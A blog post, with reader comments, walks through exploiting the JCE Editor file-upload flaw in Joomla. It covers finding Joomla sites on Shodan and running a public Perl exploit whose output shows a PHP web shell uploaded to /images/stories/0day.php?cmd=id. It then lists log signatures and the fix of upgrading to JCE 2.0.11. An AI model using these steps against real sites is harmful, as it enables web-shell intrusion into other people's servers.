If we take a look at zone-h.org website, we can see the guys like Hmei7 are hacking Joomla's websites with a JCE Editor Vulnerability every day, every minute...
It's possible that one day, when you go to your Joomla Website, you will see something like this:
How can we take advantage of the JCE Editor Weakness?
If you are using Joomla with JCE 2.0.10 (prior versions may also be affected) your website is at risks.
AmnPardaz Security Research & Penetration Testing Group published two scripts in PHP and Perl after releasing a vendor supplied patch for JCE's vulnerabilitie.
You can get those exploits scripts here.
Now, We are going to hack our own website... ;)
First of all, we need to locate a Joomla installation on Shodan: http://www.shodanhq.com/search?q=joomla
Then, we run the perl exploit in our Linux machine:
behindthefirewalls.blogspot.com@Hacking:~$ perl jce.pl xxx.com .::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::. |||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) |||| [*] Checking Exploitability ... [*] Trying to upload 0day.gif ... [*] Trying to change extension from .gif to .php ... [+] 0day.php was successfully uploaded [+] Path:xxx.com/images/stories/0day.php?cmd=id
Finally, if you get the Path, you can check if the server has been hacked. If you visit...
http://xxx.com/images/stories/0day.php?cmd=id
You will see...
In this case, we have modified the script for printing our name in the webserver.
If your are a Security Engineer, you should check in the web server logs, something like:
POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1 Head //images/stories/0day.php HTTP/1.1If you have a Snort IDS, you will see the next Snort Events...
Int the last few days, many clients have benn called me asking about these attacks. The reponse is, recover a backup of your site and updgrade to JCE 2.0.11 release.
Also, you can exploit this vulnerability with Mestasploit
You can learn how to fix this vulnerability here.
If you want to know who Hmei7 is visit this website
Great explanation by Josh Pate here.
Yes,Some times ago am also affected with this same problem.This blog would help to after here no one could not affect the same problem...
ReplyDeleteWebsite Designing Companies Bangalore
HI Karthik! Thanks for the commment. This blog want to try this, helping to others to avoid attacks agains our IT infraestructure. I will working on this!!
DeleteHey, thanks for showing how it's done, I recently had several websites attacked and now thanks to this I fixed it.
ReplyDeleteThanks for this. Just a short note, before Shodan link you are referring to drupal installations.
ReplyDeleteThe information of this blog is really interesting.Every joomla developers should know this kind of useful information for joomla website development.
ReplyDeleteWebsite Design Company in bangalore
that is a very great information i love to see this! check this bestkreative thanks for sharing..
ReplyDeleteI am always like to read these type of informative post which provide me best info about latest things happened in joomla developing. I thing today is lucky day for me to find these kind of stuff here.thanks for this!!
ReplyDeletehi i would like to read this type writing. very much pleased to read this.joomla, Joomla
ReplyDeleteThanks for sharing the security information, Every one should know this information to protect the site from unauthorized access. it's a helpful info for me.
ReplyDeleteThank you.
ReplyDeleteDrupal with some modules installed is also vulnerable to this exploit, not only Joomla.
I have seen a lot of attempts in webservers logs. I suspect that some automated zombies bot are scanning internet searching for non patches networks